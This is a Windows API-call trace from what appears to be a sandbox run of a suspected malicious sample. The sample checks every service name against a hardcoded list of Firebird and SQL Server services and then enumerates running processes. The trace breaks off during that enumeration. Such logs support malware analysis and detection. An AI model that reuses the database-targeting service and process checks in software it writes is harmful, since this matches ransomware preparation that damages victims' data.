[0190.623] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0190.623] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0190.623] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0190.623] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0190.623] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0190.623] lstrlenW (lpString="DoSvc") returned 5 [0190.623] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DoSvc") returned 1 [0190.623] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DoSvc") returned 1 [0190.623] lstrcmpiW (lpString1="sqlwriter", lpString2="DoSvc") returned 1 [0190.623] lstrcmpiW (lpString1="mssqlserver", lpString2="DoSvc") returned 1 [0190.623] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DoSvc") returned 1 [0190.623] lstrlenW (lpString="DPS") returned 3 [0190.623] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0190.623] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0190.623] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0190.623] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0190.623] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0190.623] lstrlenW (lpString="DusmSvc") returned 7 [0190.623] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DusmSvc") returned 1 [0190.623] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DusmSvc") returned 1 [0190.623] lstrcmpiW (lpString1="sqlwriter", lpString2="DusmSvc") returned 1 [0190.623] lstrcmpiW (lpString1="mssqlserver", lpString2="DusmSvc") returned 1 [0190.623] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DusmSvc") returned 1 [0190.623] lstrlenW (lpString="EventLog") returned 8 [0190.623] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventLog") returned 1 [0190.623] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventLog") returned 1 [0190.623] lstrcmpiW (lpString1="sqlwriter", lpString2="EventLog") returned 1 [0190.623] lstrcmpiW (lpString1="mssqlserver", lpString2="EventLog") returned 1 [0190.623] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventLog") returned 1 [0190.623] lstrlenW (lpString="EventSystem") returned 11 [0190.623] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0190.624] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0190.624] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0190.624] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0190.624] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0190.624] lstrlenW (lpString="FontCache") returned 9 [0190.624] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="FontCache") returned -1 [0190.624] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="FontCache") returned -1 [0190.624] lstrcmpiW (lpString1="sqlwriter", lpString2="FontCache") returned 1 [0190.624] lstrcmpiW (lpString1="mssqlserver", lpString2="FontCache") returned 1 [0190.624] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="FontCache") returned 1 [0190.624] lstrlenW (lpString="gpsvc") returned 5 [0190.624] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0190.624] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0190.624] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0190.624] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0190.624] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0190.624] lstrlenW (lpString="iphlpsvc") returned 8 [0190.624] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0190.624] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0190.624] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0190.624] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0190.624] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0190.624] lstrlenW (lpString="KeyIso") returned 6 [0190.624] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="KeyIso") returned -1 [0190.624] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="KeyIso") returned -1 [0190.624] lstrcmpiW (lpString1="sqlwriter", lpString2="KeyIso") returned 1 [0190.624] lstrcmpiW (lpString1="mssqlserver", lpString2="KeyIso") returned 1 [0190.624] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="KeyIso") returned 1 [0190.624] lstrlenW (lpString="LanmanServer") returned 12 [0190.624] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0190.624] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0190.624] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0190.624] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0190.624] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0190.624] lstrlenW (lpString="LanmanWorkstation") returned 17 [0190.624] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0190.624] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0190.624] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0190.625] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0190.625] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0190.625] lstrlenW (lpString="lfsvc") returned 5 [0190.625] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lfsvc") returned -1 [0190.625] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lfsvc") returned -1 [0190.625] lstrcmpiW (lpString1="sqlwriter", lpString2="lfsvc") returned 1 [0190.625] lstrcmpiW (lpString1="mssqlserver", lpString2="lfsvc") returned 1 [0190.625] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lfsvc") returned 1 [0190.625] lstrlenW (lpString="LicenseManager") returned 14 [0190.625] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LicenseManager") returned -1 [0190.625] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LicenseManager") returned -1 [0190.625] lstrcmpiW (lpString1="sqlwriter", lpString2="LicenseManager") returned 1 [0190.625] lstrcmpiW (lpString1="mssqlserver", lpString2="LicenseManager") returned 1 [0190.625] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LicenseManager") returned 1 [0190.625] lstrlenW (lpString="lmhosts") returned 7 [0190.625] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0190.625] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0190.625] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0190.625] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0190.625] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0190.625] lstrlenW (lpString="LSM") returned 3 [0190.625] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LSM") returned -1 [0190.625] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LSM") returned -1 [0190.625] lstrcmpiW (lpString1="sqlwriter", lpString2="LSM") returned 1 [0190.625] lstrcmpiW (lpString1="mssqlserver", lpString2="LSM") returned 1 [0190.625] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LSM") returned 1 [0190.625] lstrlenW (lpString="MpsSvc") returned 6 [0190.625] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0190.625] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0190.625] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0190.625] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0190.625] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0190.625] lstrlenW (lpString="NcbService") returned 10 [0190.625] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NcbService") returned -1 [0190.625] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NcbService") returned -1 [0190.625] lstrcmpiW (lpString1="sqlwriter", lpString2="NcbService") returned 1 [0190.625] lstrcmpiW (lpString1="mssqlserver", lpString2="NcbService") returned -1 [0190.626] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NcbService") returned 1 [0190.626] lstrlenW (lpString="netprofm") returned 8 [0190.626] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0190.626] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0190.626] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0190.626] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0190.626] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0190.626] lstrlenW (lpString="NlaSvc") returned 6 [0190.626] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0190.626] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0190.626] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0190.626] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0190.626] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0190.626] lstrlenW (lpString="nsi") returned 3 [0190.626] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0190.626] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0190.626] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0190.626] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0190.626] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0190.626] lstrlenW (lpString="PcaSvc") returned 6 [0190.626] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0190.626] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0190.626] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0190.626] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0190.626] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0190.626] lstrlenW (lpString="PlugPlay") returned 8 [0190.626] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0190.626] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0190.626] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0190.626] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0190.626] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0190.626] lstrlenW (lpString="Power") returned 5 [0190.626] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0190.626] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0190.626] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0190.626] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0190.626] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0190.627] lstrlenW (lpString="ProfSvc") returned 7 [0190.627] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0190.627] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0190.627] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0190.627] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0190.627] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0190.627] lstrlenW (lpString="RpcEptMapper") returned 12 [0190.627] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0190.627] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0190.627] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0190.627] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0190.627] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0190.627] lstrlenW (lpString="RpcSs") returned 5 [0190.627] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0190.627] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0190.627] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0190.627] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0190.627] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0190.627] lstrlenW (lpString="SamSs") returned 5 [0190.627] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0190.627] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0190.627] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0190.627] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0190.627] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0190.627] lstrlenW (lpString="Schedule") returned 8 [0190.627] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0190.627] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0190.627] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0190.627] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0190.627] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0190.627] lstrlenW (lpString="SecurityHealthService") returned 21 [0190.627] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SecurityHealthService") returned -1 [0190.627] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SecurityHealthService") returned -1 [0190.627] lstrcmpiW (lpString1="sqlwriter", lpString2="SecurityHealthService") returned 1 [0190.628] lstrcmpiW (lpString1="mssqlserver", lpString2="SecurityHealthService") returned -1 [0190.628] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SecurityHealthService") returned 1 [0190.628] lstrlenW (lpString="SENS") returned 4 [0190.628] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0190.628] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0190.628] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0190.628] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0190.628] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0190.628] lstrlenW (lpString="ShellHWDetection") returned 16 [0190.628] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0190.628] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0190.628] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0190.628] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0190.628] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0190.628] lstrlenW (lpString="Spooler") returned 7 [0190.628] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0190.628] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0190.628] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0190.628] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0190.628] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0190.628] lstrlenW (lpString="sppsvc") returned 6 [0190.628] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="sppsvc") returned -1 [0190.628] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="sppsvc") returned -1 [0190.628] lstrcmpiW (lpString1="sqlwriter", lpString2="sppsvc") returned 1 [0190.628] lstrcmpiW (lpString1="mssqlserver", lpString2="sppsvc") returned -1 [0190.628] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="sppsvc") returned 1 [0190.628] lstrlenW (lpString="SSDPSRV") returned 7 [0190.628] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SSDPSRV") returned -1 [0190.628] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SSDPSRV") returned -1 [0190.628] lstrcmpiW (lpString1="sqlwriter", lpString2="SSDPSRV") returned -1 [0190.628] lstrcmpiW (lpString1="mssqlserver", lpString2="SSDPSRV") returned -1 [0190.629] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x370 [0190.634] Process32FirstW (in: hSnapshot=0x370, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0190.640] Process32NextW (in: hSnapshot=0x370, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6e, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0190.641] lstrlenW (lpString="System") returned 6 [0190.641] Process32NextW (in: hSnapshot=0x370, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0190.644] lstrlenW (lpString="smss.exe") returned 8 [0190.644] Process32NextW (in: hSnapshot=0x370, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x19c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x194, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0190.645] lstrlenW (lpString="csrss.exe") returned 9 [0190.645] Process32NextW (in: hSnapshot=0x370, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x194, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0190.645] lstrlenW (lpString="wininit.exe") returned 11 [0190.645] Process32NextW (in: hSnapshot=0x370, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e4, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0190.646] lstrlenW (lpString="csrss.exe") returned 9 [0190.646] Process32NextW (in: hSnapshot=0x370, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e4, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0190.647] lstrlenW (lpString="winlogon.exe") returned 12 [0190.647] Process32NextW (in: hSnapshot=0x370, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1ec, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0190.647] lstrlenW (lpString="services.exe") returned 12 [0190.647] Process32NextW (in: hSnapshot=0x370, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1ec, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0190.648] lstrlenW (lpString="lsass.exe") returned 9 [0190.648] Process32NextW (in: hSnapshot=0x370, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0190.649] lstrlenW (lpString="svchost.exe") returned 11 [0190.649] Process32NextW (in: hSnapshot=0x370, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x234, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0190.650] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0190.650] Process32NextW (in: hSnapshot=0x370, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1ec, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0190.651] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0190.651] Process32NextW (in: hSnapshot=0x370, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x318, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0190.652] lstrlenW (lpString="svchost.exe") returned 11 [0190.652] Process32NextW (in: hSnapshot=0x370, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x374, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x234, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0190.652] lstrlenW (lpString="dwm.exe") returned 7 [0190.652] Process32NextW (in: hSnapshot=0x370, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6b, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0190.653] lstrlenW (lpString="svchost.exe") returned 11 [0190.653] Process32NextW (in: hSnapshot=0x370, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0190.654] lstrlenW (lpString="svchost.exe") returned 11 [0190.654] Process32NextW (in: hSnapshot=0x370, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0190.654] lstrlenW (lpString="svchost.exe") returned 11 [0190.654] Process32NextW (in: hSnapshot=0x370, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x12c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0190.655] lstrlenW (lpString="svchost.exe") returned 11 [0190.655] Process32NextW (in: hSnapshot=0x370, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x25, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0190.656] lstrlenW (lpString="svchost.exe") returned 11 [0190.656] Process32NextW (in: hSnapshot=0x370, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0190.656] lstrlenW (lpString="svchost.exe") returned 11 [0190.656] Process32NextW (in: hSnapshot=0x370, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0190.657] lstrlenW (lpString="svchost.exe") returned 11 [0190.657] Process32NextW (in: hSnapshot=0x370, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x530, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0190.658] lstrlenW (lpString="svchost.exe") returned 11 [0190.658] Process32NextW (in: hSnapshot=0x370, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x538, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0190.658] lstrlenW (lpString="svchost.exe") returned 11 [0190.658] Process32NextW (in: hSnapshot=0x370, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0190.659] lstrlenW (lpString="spoolsv.exe") returned 11 [0190.659] Process32NextW (in: hSnapshot=0x370, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0190.660] lstrlenW (lpString="svchost.exe") returned 11 [0190.660] Process32NextW (in: hSnapshot=0x370, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0190.660] lstrlenW (lpString="svchost.exe") returned 11 [0190.660] Process32NextW (in: hSnapshot=0x370, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x4fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0190.661] lstrlenW (lpString="audiodg.exe") returned 11 [0190.661] Process32NextW (in: hSnapshot=0x370, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0190.662] 